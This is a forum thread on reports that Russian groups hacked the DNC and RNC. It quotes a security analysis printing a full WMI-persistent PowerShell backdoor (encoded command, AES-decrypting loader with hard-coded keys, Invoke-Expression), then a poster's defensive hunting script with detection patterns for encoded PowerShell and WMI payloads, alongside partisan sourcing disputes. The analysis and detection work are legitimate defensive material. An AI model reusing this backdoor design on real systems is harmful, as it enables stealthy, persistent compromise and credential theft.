Intelligence agencies conclude that Republicans were also targeted ahead of election, The New York Times says, though motivation remains unclear
“We now have high confidence that they hacked the DNC and the RNC, and conspicuously released no documents” from the Republican organization, one senior administration official told The New York Times, referring to hackers allegedly working for the Russian government.
Rep. Michael McCaul, the Texas Republican who is the chairman of the House Homeland Security Committee, said on CNN in September that the RNC had been hacked by Russia, but then quickly withdrew the claim.
McCaul initially told CNN’s Wolf Blitzer “It’s important to note, Wolf, that they have not only hacked into the DNC but also into the RNC.” He added that “the Russians have basically hacked into both parties at the national level, and that gives us all concern about what their motivations are.”
Minutes later, the RNC issued a statement denying that it had been hacked. McCaul subsequently said that he had misspoken, but that it was true that “Republican political operatives” had been the target of Russian hacking. So were establishment Republicans with no ties to the campaign, including former Secretary of State Colin L. Powell.
originally posted by: IgnoranceIsntBlisss
They can't even prove the DNC was hacked by Russia, so now we're to believe they know the RNC was too?
This makes me think FAKE NEWS!
At DNC, COZY BEAR intrusion has been identified going back to summer of 2015, while FANCY BEAR separately breached the network in April 2016. We have identified no collaboration between the two actors, or even an awareness of one by the other. Instead, we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials. While you would virtually never see Western intelligence agencies going after the same target without de-confliction for fear of compromising each other’s operations, in Russia this is not an uncommon scenario. “Putin’s Hydra: Inside Russia’s Intelligence Services”, a recent paper from the European Council on Foreign Relations, does an excellent job outlining the highly adversarial relationship between Russia’s main intelligence services – Федеральная Служба Безопасности (FSB), the primary domestic intelligence agency but one that also has a significant external collection and ‘active measures’ remit, Служба Внешней Разведки (SVR), the primary foreign intelligence agency, and the aforementioned GRU. Not only do they have overlapping areas of responsibility, but they also rarely share intelligence and even occasionally steal sources from each other and compromise operations. Thus, it is not surprising to see them engage in intrusions against the same victim, even when it may be a waste of resources and lead to the discovery and potential compromise of mutual operations.
The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with py2exe and another PowerShell backdoor with persistence accomplished via the Windows Management Instrumentation (WMI) system, which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule. The PowerShell backdoor is ingenious in its simplicity and power. It consists of a single obfuscated command set up to run persistently, such as:
powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0A
This decodes to:
# Runs a crypto transform (here the AES decryptor) over a byte array via a CryptoStream
function perfCr($crTr, $data) {
    $ret = $null
    try {
        $ms = New-Object System.IO.MemoryStream
        $cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
        $cs.Write($data, 0, $data.Length)
        $cs.FlushFinalBlock()
        $ret = $ms.ToArray()
        $cs.Close()
        $ms.Close()
    }
    catch {}
    return $ret
}
# AES (Rijndael, default CBC/PKCS7) decryption with the hard-coded key and IV below
function decrAes($encData, $key, $iv)
{
    $ret = $null
    try {
        $prov = New-Object System.Security.Cryptography.RijndaelManaged
        $prov.Key = $key
        $prov.IV = $iv
        $decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
        $ret = perfCr $decr $encData
    }
    catch {}
    return $ret
}
# Reads the base64 payload from a static property of a WMI class, decrypts it and executes it in memory
function sWP($cN, $pN, $aK, $aI)
{
    if($cN -eq $null -or $pN -eq $null) {return $false}
    try {
        $wp = ([wmiclass]$cN).Properties[$pN].Value
        $exEn = [Convert]::FromBase64String($wp)
        $exDec = decrAes $exEn $aK $aI
        $ex = [Text.Encoding]::UTF8.GetString($exDec)
        if($ex -eq $null -or $ex -eq '')
        {return}
        Invoke-Expression $ex
        return $true
    }
    catch {
        return $false
    }
}
$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
sWP 'Wmi' 'Wmi' $aeK $aeI | Out-Null
This one-line PowerShell command, stored only in the WMI database, establishes an encrypted connection to C2 and downloads additional PowerShell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. The encryption keys in the script were different on every system. A PowerShell version of the credential theft tool Mimikatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.
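The backdoor quoted above lives in two places in the WMI repository: a permanent event subscription that launches powershell.exe with an -EncodedCommand on an uptime or schedule trigger, and a custom WMI class whose static string property holds the base64-wrapped AES payload that sWP reads and decrypts. The hunting script below is an added example, written for this thread and not taken from the CrowdStrike post or its code. It assumes Windows PowerShell 5.1 or later with the CIM cmdlets, an elevated session on the host being examined, that the class is in root\cimv2 (the default namespace for [wmiclass]), and that the class-name exclusions and the 256-byte threshold are tuning choices rather than anything the post states.

```powershell
# Added hunting example (not CrowdStrike code). Assumes PowerShell 5.1+, CIM cmdlets, elevated session.

function ConvertFrom-EncodedCommand {
    # -EncodedCommand (also -enc, -ec, -e) carries base64 of a UTF-16LE string, not UTF-8,
    # which is why the blob on the page decodes with the Unicode encoding.
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '(?i)-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})') {
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
    }
    return $null
}

function Get-SuspiciousWmiSubscription {
    # Permanent subscriptions live in root\subscription as three objects: __EventFilter (the WQL
    # trigger), __EventConsumer (the action) and __FilterToConsumerBinding (the pairing).
    $results = @()
    foreach ($f in Get-CimInstance -Namespace root\subscription -ClassName __EventFilter) {
        # Uptime/schedule triggers usually poll Win32_PerfFormattedData_PerfOS_System.SystemUpTime
        # or Win32_LocalTime through "__InstanceModificationEvent WITHIN n" (assumed common pattern).
        if ($f.Query -match '(?i)SystemUpTime|Win32_LocalTime|Win32_PerfFormattedData') {
            $results += [pscustomobject]@{ Kind = 'Filter'; Name = $f.Name; Detail = $f.Query; Decoded = $null }
        }
    }
    foreach ($c in Get-CimInstance -Namespace root\subscription -ClassName __EventConsumer) {
        $type = $c.CimClass.CimClassName
        $cmd = switch ($type) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { $c.ScriptText }
            default                     { $null }
        }
        if ($cmd -and $cmd -match '(?i)powershell|-enc|-EncodedCommand|Bypass|Invoke-Expression|\bIEX\b') {
            $results += [pscustomobject]@{ Kind = $type; Name = $c.Name; Detail = $cmd; Decoded = (ConvertFrom-EncodedCommand $cmd) }
        }
    }
    return $results
}

function Get-WmiClassPayload {
    # sWP reads ([wmiclass]'Wmi').Properties['Wmi'].Value: the default value of a static string
    # property on a class. Look for non-system classes carrying a large base64-looking default.
    param([string]$Namespace = 'root\cimv2', [int]$MinLength = 256)
    $hits = @()
    foreach ($cls in Get-CimClass -Namespace $Namespace) {
        # Exclusions cut noise from Microsoft class families; an attacker could of course name a
        # class Win32_Something, so widen the search if a triage warrants it.
        if ($cls.CimClassName -match '^(__|CIM_|Win32_|MSFT_|Msvm_)') { continue }
        foreach ($p in $cls.CimClassProperties) {
            $v = $p.Value
            if ($p.CimType -eq 'String' -and $v -is [string] -and $v.Length -ge $MinLength -and $v -match '^[A-Za-z0-9+/]+={0,2}$') {
                $hits += [pscustomobject]@{ Class = $cls.CimClassName; Property = $p.Name; Length = $v.Length }
            }
        }
    }
    return $hits
}

# Offline check using the persistence one-liner quoted in this thread: it decodes to the first
# line of the script, "function perfCr($crTr, $data)", because the blog truncated the blob.
$sample = 'powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0A'
ConvertFrom-EncodedCommand $sample

# Live hunt on the host being examined (elevated session).
Get-SuspiciousWmiSubscription | Format-List
Get-WmiClassPayload | Format-Table -AutoSize
Get-WmiClassPayload -Namespace root\default | Format-Table -AutoSize
```

Two caveats a responder should keep in mind. First, a payload class can be compiled into any namespace, so root\default (a common choice for MOF-planted classes) is checked alongside root\cimv2; extend the list if the host has product-specific namespaces. Second, this is a point-in-time inventory; for continuous coverage, Sysmon event IDs 19, 20 and 21 record creation of WMI event filters, consumers and bindings, and the same decoding of -EncodedCommand applies to the command lines they log.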
originally posted by: Gothmog
a reply to: Kettu
Times of Israel? Really? Yeah...
Not.
You're getting as bad as another poster I know....
Just put ANYTHING from ANYWHERE out there as long as it is anti-Right.
How about a source like CNN or Fox reporting that the CIA has found this out....
It doesn't exist.
originally posted by: Voiceofthemajority
originally posted by: Kettu
one senior administration official told The New York Times
Another impeccably sourced story